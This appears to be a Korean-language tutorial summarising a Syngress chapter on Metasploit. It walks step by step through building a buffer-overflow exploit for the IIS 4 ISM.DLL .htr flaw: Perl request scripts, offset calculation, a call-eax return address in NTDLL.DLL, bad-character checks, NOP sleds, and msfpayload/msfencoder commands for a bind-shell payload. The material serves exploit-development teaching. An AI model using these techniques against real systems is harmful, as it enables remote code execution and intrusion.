본문서는 Syngress 의 Writing Security Tools and Exploits Chap11 을요약정리한 것입니다. 참고로 Chap 10 ~ 12 까지가 Metasploit 에대한설명입니다. Metasploit Framework 활용법 1. Metasplo

Similar documents
Deok9_Exploit Technique

how_2_write_Exploit_4_the_MSF_v3.x.hwp

hlogin2

Exploit writing tutorials

커알못의 커널 탐방기 이 세상의 모든 커알못을 위해서

버퍼오버플로우-왕기초편 10. 메모리를 Hex dump 뜨기 앞서우리는버퍼오버플로우로인해리턴어드레스 (return address) 가변조될수있음을알았습니다. 이제곧리턴어드레스를원하는값으로변경하는실습을해볼것인데요, 그전에앞서, 메모리에저장된값들을살펴보는방법에대해배워보겠습

취약점분석보고서 [Photodex ProShow Producer v ] RedAlert Team 안상환

PowerPoint Template

Poison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3

Microsoft Word - Exploit writing tutorial part 1.doc

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환

Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 11 년 10 월 26 일수요일

게시판 스팸 실시간 차단 시스템

취약점분석보고서 [CyberLink Power2Go name attribute (p2g) Stack Buffer Overflow Exploit] RedAlert Team_ 강동우

Microsoft Word - GOM-StackOverFlow.doc

Microsoft Word - 3부A windows 환경 IVF + visual studio.doc

UI TASK & KEY EVENT

ActFax 4.31 Local Privilege Escalation Exploit

Microsoft Word - MSOffice_WPS_analysis.doc

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks

목차 1. 소개... 3 가. BOF란?... 3 나. 윈도우 BOF 개발환경및사용툴 Shellcode 작성하기... 4 가. cmd 쉘 ) 소스코드작성 ) 디스어셈블리 ) 어셈블리코드편집 간단

금오공대 컴퓨터공학전공 강의자료

문서개정이력 개정번호개정사유및내용개정일자 1.0 최초작성 본문서는원문작성자 (Peter Van Eeckhoutte) 의허가하에번역및배포하는문서로, 원문과관련된모든내용의저작권은 Corelan에있으며, 추가된내용에대해서는 ( 주 ) 한국정보보호교육센터에

INTRO Basic architecture of modern computers Basic and most used assembly instructions on x86 Installing an assembly compiler and RE tools Practice co

1.hwp

ISP and CodeVisionAVR C Compiler.hwp

PowerPoint 프레젠테이션

목 차 1. 개요 취약점분석추진배경 취약점요약 취약점정보 취약점대상시스템목록 분석 공격기법및기본개념 시나리오 공격코드

SPECweb Install

Eureka Mail Client_v2.2.q를이용하여에그헌팅에대하여알아볼것이다. 익스플로잇을위해구성된환경은아래와같다. - Windows XP Professional SP3 KOR - Python Ollydbg 1.x, Immunity Debugger

PCServerMgmt7

Microsoft Word - Static analysis of Shellcode.doc

hlogin7

Eureka Mail Client_v2.2.q를이용하여오믈렛에그헌팅에대하여알아볼것이다. 익스플로잇을위해구성된환경은아래와같다. - Windows XP Professional SP3 KOR - Python Ollydbg 1.x, Immunity Debugg

Microsoft Word - SEH_Overwrites_Simplified.doc

JVM 메모리구조

PowerPoint 프레젠테이션

Microsoft Word - building the win32 shellcode 01.doc

Microsoft PowerPoint - a5a.ppt [호환 모드]

vi 사용법

IDA 5.x Manual hwp

Microsoft Word - Crackme 15 from Simples 문제 풀이_by JohnGang.docx

Research & Technique Apache Tomcat RCE 취약점 (CVE ) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE 취약점은 W

Table Of Contents 1/7 0. Introduction 0-1. Introduction 0-1. Testing Environment 1. Software Vulnerabilty Review 1-1. Buffer OverFlow 1-2. Format Stri

TTA Journal No.157_서체변경.indd

Microsoft PowerPoint - chap01-C언어개요.pptx

Adobe Flash 취약점 분석 (CVE )

Evernote Export

Microsoft PowerPoint - a10.ppt [호환 모드]

임베디드시스템설계강의자료 6 system call 2/2 (2014 년도 1 학기 ) 김영진 아주대학교전자공학과

PowerPoint Template

The Pocket Guide to TCP/IP Sockets: C Version

Return-to-libc

Network Security - Wired Sniffing 실습 ICNS Lab. Kyung Hee University

105È£4fš

C# Programming Guide - Types

Microsoft PowerPoint - chap02-C프로그램시작하기.pptx

ÀÎÅÍ³Ý ÁøÈï¿ø 3¿ù ÀúÇØ»ó

취약점분석보고서 [Elecard AVC_HD/MPEG Player 5.7 Buffer Overflow] RedAlert Team 봉용균

API 매뉴얼

HLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 :

목차 개요... 3 CVE /CVE 요약... 3 CVE /CVE 분석 취약점발생원인 CVE 와 CVE 의연관성및차이점... 7 C

3장

API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum

PowerPoint 프레젠테이션

Computer Security Chapter 08. Format String 김동진 1 Secure Software Lab.

텀블러514

< E20C6DFBFFEBEEE20C0DBBCBAC0BB20C0A7C7D12043BEF0BEEE20492E707074>

메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - qmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i qmail 1.03 spf-filter 년 6 월

다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) <% RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp");

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc

10 강. 쉘스크립트 l 쉘스크립트 Ÿ 쉘은명령어들을연속적으로실행하는인터프리터환경을제공 Ÿ 쉘스크립트는제어문과변수선언등이가능하며프로그래밍언어와유사 Ÿ 프로그래밍언어와스크립트언어 -프로그래밍언어를사용하는경우소스코드를컴파일하여실행가능한파일로만들어야함 -일반적으로실행파일은다

Secure Programming Lecture1 : Introduction

Microsoft PowerPoint - secu10.pptx

슬라이드 1

Microsoft PowerPoint - Lecture_Note_7.ppt [Compatibility Mode]

OCW_C언어 기초

<B1E2BCFAB9AEBCAD5FB9DABAB4B1D45F F F64746F72732E687770>

Cogame 취약점 보고

리눅스 취약점대응방안권고 / KISA 취약점점검팀 영향받는플랫폼 OS, FAQ 추가 개요 미국보안회사 에의해 시스템의 라이브러리 의특정함수에서임의코드를실행할수있는취약점이공개 해당취약점은 CVE 지정, 도메인네임을

Microsoft Word - Reverse Engineering Code with IDA Pro-2-1.doc

Secure Programming Lecture1 : Introduction

익스플로잇실습 / 튜토리얼 Easy RM to MP3 Converter ROP [ Direct RET VirtualProtect() 함수사용 ] By WraithOfGhost

simple ROP Exploit

02 C h a p t e r Java

Microsoft PowerPoint - chap10-함수의활용.pptx

Microsoft Word - FunctionCall

Microsoft PowerPoint APUE(Intro).ppt

<322EBCF8C8AF28BFACBDC0B9AEC1A6292E687770>

[Brochure] KOR_TunA

Microsoft PowerPoint - [Practice #1] APM InstalI.ppt

로거 자료실

메일서버등록제(SPF) 인증기능적용안내서 (AIX - sendmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 AIX 5.3 sendmail spf-filter 년 6 월

Microsoft Word - Heap_Spray.doc

Level 4 ( hell_fire -> evil_wizard ) ~]$ cat evil_wizard.c /* The Lord of the BOF : The Fellowship of the BOF - evil_wizard

Microsoft PowerPoint UNIX Shell.pptx

Microsoft PowerPoint - ch04_코드 보안 [호환 모드]

Basic of Real World Exploit on Windows Author

제이쿼리 (JQuery) 정의 자바스크립트함수를쉽게사용하기위해만든자바스크립트라이브러리. 웹페이지를즉석에서변경하는기능에특화된자바스크립트라이브러리. 사용법 $( 제이쿼리객체 ) 혹은 $( 엘리먼트 ) 참고 ) $() 이기호를제이쿼리래퍼라고한다. 즉, 제이쿼리를호출하는기호

untitled

Transcription:

본문서는 Syngress 의 Writing Security Tools and Exploits Chap11 을요약정리한 것입니다. 참고로 Chap 10 ~ 12 까지가 Metasploit 에대한설명입니다. Metasploit Framework 활용법 1. Metasploit Framework(MSF) 이란? bluearth in N@R 2003년오픈소스로발표된취약점발견및공격을위한 Framework로취약점에대한깊이있는지식없이도간단히알려진취약점을공격할수있게도와주는 Tools - 취약점을발견하기위해서는관련된전문지식이필요하나, 단지공격만을위해서는몇번의마우스조작으로공격가능함. 기본사용법은 Metasploit Framework 사용법.gul 참고 2. Metasploit 이용한 Exploit 작성 Metasploit 기본사용법에서는타켓설정, 환경설정등몇가지간단한작업만으로취약한시스템을공격할수있었다. 이것은알려진 Exploit를조금수정해서사용하는것이다. 하지만우리는알려지지않은취약점을발견하고공격하기를원하기때문에 Metasploit Framework를이용해서어떻게취약점을찾고 Exploit 코드를만들수있는지단계적으로알아보자 여기서는 Windows NT Service Pack 5에서운영중인 IIS 4 를공격 http://www.eeye.com/html/research/advisories/ad19990608.html 1) 공격 Vector 결정하기여기서 Vector란 OS나응용프로그램이오작동을일으켜공격자의임의의명령을실행시킬수있게하는취약한지점을말한다. IIS4.0가운영중인서버에사용자가홈페이지파일을호출할때, 파일이름을 ISM.DLL로넘긴다. 그러나 ISM.DLL에서파일이름길이에대해체크를하지않아서만약긴파일명이들어오면해당함수에서버퍼오버플러우가일어나고리턴어드레스를덮어쓰게된다. ISM.DLL의실행흐름가로채기를통해결과적으로 inetinfo.exe 프로세스를공격해서임의의 Payload( 명령어 ) 를실행시킬수있게된다. * 이문서에서는공격지점을 Attack Vector로, 버퍼오버플러우시키는방법을 Control Vector로표현하였다.

1> IIS 웹서버에 Request 보내기 1 일반적인 HTTP Request 전송 GET /index.htm HTTP/1.0 \r\n\r\n GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.htm http/1.0 \r\n\r\n 2> Offset 찾기 ( 얼마나긴파일명을넣어야할까?) : Attack Vector 1 일단 Perl 이용해서긴파일명 (4000문자) 만들어서보내자!! Script #1 $string = "GET /"; $string.= "A" x 4000; $string.= ".htr HTTP/1.0 \r\n\r\n"; open(nc," nc.exe 192.168.181.129 80"); print NC $string; close(nc) 2 Debugger를이용해서어떤일이일어나는지확인 * Debugger 사용방법 (1) Debugger로 inetinfo.exe에 Attach (2) Script #1 실행 (3) 공격문자 (4000문자) 가리턴주소덮어씀 (4) 리턴주소가 EIP에들어감 (5) 프로세서가 EIP 안에있는유효하지않은주소에접근시도시프로그램은접근위반을일으킨다.( 에러난다는이야기 ) (6) Debugger에의해접근위반이감지되고프로세스중지됨 (7) 프로세스가중지될때, Debugger는가상주소, 디스어셈블리, 현재스택, 레지스터상태등의프로세스정보를보여준다.

- 4000 문자인파일명이들어갔을때 Debugger 에서의상태 * 유명한 Debugger http://www.microsoft.com/whdc/devtools/debugging/default.mspx http://www.ollydbg.de --- 여기서는이거사용^^ 3 리턴어드레스까지의거리구하기 - 4000개의 A를넣으면리턴어드레스가변경되지만몇번째 AAAA(4byte) 가리턴어드레스를덮어썼는지알수었음 - Metasploit내 Pex.pm 라이브러리의 PatternCreate() 함수를이용하여특정문자열패턴을만들어서사용하면나중에그문자까지의거리를계산할수있음 (msfcli, msfconsole 환경에서 ) $ perl -e 'use Pex; print Pex::Text::PatternCreate(4000)'

$ perl -e 'use Pex; print Pex::Text::PatternCreate(4000)' > pattern.txt $string = "GET /"; $string.= $pattern; $string.= ".htr HTTP/1.0 \r\n\r\n"; open(nc," nc.exe 192.168.181.129 80"); print NC $string; close(nc);

- Debugger 로프로세스에 attach 후위의 Perl 스크립트를실행시키면 EIP 가특정문자로변경된상태를볼수있다.(Ollydbg 사용 ) - EIP를보면 Ox74413674가보이는데이값을 ASCII로바꾸면 ta6t이다그러나 x86 계열은리틀엔디언메모리구조를사용하므로실제문자는 t6at 가된다. - 구해진값을가지고실제이값까지의거리를계산해보자 $./patternoffset.pl 0x74413674 4000 ===> 589 ( 결과 ) 4 리턴어드레스값을바꿔보자! - 우리가원하는값으로바꾸기위한 HTTP Request 구조 앞에 589byte 문자넣고 590 ~ 593(4byte) 를우리가원하는값으로 넣으면 EIP 를임의의값으로수정할수있다.

3> 우리가원하는프로그램실행시키는방법 : Control Vector 선택 1 Stack 으로바로리턴시키기 여기서 Payload 는쉘코드 라고보면됨 (1) Saved return address 를 Stack 상의 Payload 가있는주소로덮어씀 (2) 덮어쓰인주소가 EIP 로들어감 (3) 프로세서는 EIP 레지스터안의주소를실행시킴 ( 우리의코드실행 ) Unix 시스템에서는프로그램이 Process 기반으로실행되므로 Stack의주소가고정적이나, 불행히도 Windows 시스템은프로그램이 Thread 기반으로실행되기때문에 Stack의주소가유동적이여서위의 1 같은방법으로공격하면실패할확률이높다.

2 Shared Library 이용한리턴 (1) EAX 레지스터에우리의 Payload( 쉘코드 ) 가있다고가정하고, EAX의값을 EIP로복사하는명령어가있는주소를 ( 예 : shared library인 kernel32.dll 안의 jmp esp, call eax, jmp eax 명령어가있는주소 ) saved return address에덮어쓴다 (2) 덮어씌어진주소가 pop 되어 EIP로들어간다 (DLL 내의명령어가있는주소 ) : 예를들면 kernel32.dll 내에 jmp eax 명령어가있는곳의주소 (3) EAX 값이 EIP로복사된다 ( 예 : jmp eax) (4) EIP 값이실행되어우리가원하는 Payload가실행된다. EIP 를변경하는대표적인명령어 (JMP, CALL)

* 우리가변경할수있는레지스터와거리 - EAX 와 ESI 를변경할수있으며, 여기서는 EAX 를사용예정 - ESI 와 EAX 까지의거리계산 $./patternoffset.pl 0x38744137 4000 ==> EAX(593) $./patternoffset.pl 0x41357441 4000 ==> ESI(585)

4> 리턴어드레스찾기 1 Metasploit Web 을이용한주소찾기 (DLL 내의특정명령이있는주소 ) - http://metasploit.com/users/opcode/msfopcode.cgi - Metasploit Opcode Database 사용해서 Opcode 주소찾기 Opcode를찾기위해서두가지방법을사용할수있다. 첫번째는타겟프로세스가로드한 DLL에서 Drop-Down 방식으로찾는방법이있고, 두번째는사용자가 DLL 리스트를넣고 windbg 모듈로찾는방법이있으나여기서는주로첫번째방법을사용한다. Opcode Class : 어떤작업을하는명령어인지예 ) eax 를 eip 복사 Opcode Meta Type : 어떤 Opcode Pattern 인지예 ) jmp, pop, call Specific Opcode : 특정한 Opcode 예 ) jmp esp, call eax

(1) Opcode Class, Type, 특별한 OPCODE 선택 - Opcode 선택 (eax 값을 eip 로바꾸는 Opcode 검색 ) - 세가지방법중원하는방법선택 (2) Opcode 찾고자하는 DLL 선택

(3) 타겟대상 OS 및 Service Pack, 언어선택 (4) 원하는 Address 선택

- 해당 DLL 클릭시 DLL 에대한상세정보확인가능 2 Command-Line 이용한주소검색 (msfpescan, msfelfscan)

- 특정 DLL 을해당디렉토리에복사후원하는 Opcode 검색 $ msfpescan -f kernel32.dll -j eax OPCODE 의주소는 OS, 언어, 패치등에의해바뀔수있으므로확인해야함

5> 리턴어드레스사용하기 - 이제 NTDLL.DLL의 0x77f76385 에 EAX 값을 EIP로옮기는 Opcode 인 call eax가있음을확인했고, Saved Return Address가있는 Stack 까지의거리는 590 ~ 593 byte 임을알고있다. - EAX 값을찾은 OPCODE 주소로바꿔보자 $string = "GET /"; $string.= "\xcc" x 589; $string.= "\x85\x63\xf7\x77"; $string.= "\xcc" x 500 $string.= ".htr HTTP/1.0 \r\n\r\n"; open(nc," nc.exe 192.168.181.129 80"); print NC $string; close(nc); Oxcc 에대해 Windows 에서 0xcc 는 Int 3 의 OPCODE 이며쉽게말해서 Break Point 라고보면됩니다. 여기서 Stack 을 0xcc 로채운이유는 EIP 가적절한 위치가아닌다른곳에위치하게되면에러가나게해서 Debugger 를 이용해서 EIP 위치를수정하기위해서사용합니다. 우리의목적은 Int 3 을실행시키는게아니라우리의 Payload( 쉘코드 ) 를실행시키는것입니다.

6> Payload 제한확인하기 1 나쁜문자확인 - 많은프로그램들이문자를입력받을때필터링을하기때문에 Payload를보내기전에반드시필터링되는문자가있는지확인하고필터링되는문자는변환시켜서전송해야함 - 필터링되는지확인하는방법 (1) 일단보내본다 - 실행안되면필터링의심..^^ (2) Test String을만들어서보내어 Debugger로필터링되는문자확인. Saved Return Address에는유효하지않은주소넣고나머지빈공간에 \x01 ~ \xff(ascii 값 0~255) 반복해서넣는다. 보통 0x00은필터링되므로 Test String에넣지않는다예 ) Test String 구성 2 Space( 공간, 크기 ) 확인공격할수있는공간의크기가클수록좋다. 작으면그만큼 Payload를넣을공간이작게되어여러다른방법을찾아야하는경우도생긴다그렇기때문에 Attack Vector에서사용가능한 Space( 보통 Buffer 크기 ) 를확인하는게중요하다

- Debugger로메모리스캔을해서리턴어드레스전까지 0xcc가 589 byte 채워져있는지확인 - 리턴어드레스변경후 0x00F0FCCC부터 0x00F0FFFF 까지 0xcc로채워진모습확인가능 (0x00F0FFFF - 0x00F0FCCC = 820[10진수 ]) - 사용가능한 Space는 589 + 820 = 1409byte 3 NOP Sleds EIP가정확히우리의 Payload의위치를가르키고있다면좋겠지만실제적으로그렇지않을경우가많기때문에우리는 Payload 앞에 NOP Sleds를넣어 EIP가 NOP Sleds의어느위치라도오게되면 Payload 까지넘어가게되어실행시킬수있게하여 Exploit이성공할확률을높일수있다 - 일반적으로 x86 계열에서는 NOP로 0x90이많이쓰인다.(IDS에탐지됨 ) - Metasploit Framework에서는 2가지의 NOP Sleds 생성기를제공함 (1) Pex 생성기 : Single Byte 혼합된 Nop Sleds 생성 (2) Opty2 생성기 : Multi Byte(1~6 Byte) 혼합된 Nops Sleds 생성 지금까지알려진 NOP Sleds 중가장우수함

7> Payload 와 Encoder 선택 (msfcli/msfconsole 사용 ) $ msfpayload -h 1 win32_bind Payload 선택 ($ msfpayload win32_bind S)

- 필수항목은 LPORT와 EXITFUNC(Default : 4444, seh) - win32_bind Payload 를 C언어형식으로출력 $ msfpayload win32_bind LPORT=31337 C * C : C 언어, P : Perl, R : Encoder 편리위해파일로저장 $ msfpayload win32_bind LPORT=31337 R > payload

2 Encoding 하기 Encoding은 Payload에서필터링될수있는나쁜문자를없애고또한 IDS에탐지하는것을더욱더어렵게하는효과를낸다 Encoding 시에는반드시 Decoder도같이넣어줘야한다 $ msfencoder -h $ msfencoder -n PexAlphaNum ==> PexAlphaNum 의상세정보

- Metasploit 에서제공하는 Encoder 종류 $ msfencoder -i payload -b '\x00' -e PexAlphaNum * 위의 payload 는 msfpayload 명령시 R 옵셥으로만든파일임

7> Payload 와 Encoder 선택 (msfweb 사용 ) 1 msfweb 실행후 Payloads 탭클릭 2 OS 및 Payload 종류선택

3 포트및 Encoder 등선택후 Generate Payload 8> 생성한코드로 Exploit 작성

최종공격문자열 Exploit 성공화면 Payload 및 Framework 확장에대한 Chap 12 가있습니다. 그건언제추가될지의문ㅋㅋㅋ

2024 © docsplayer.org 개인정보보호 | 약관 | 지원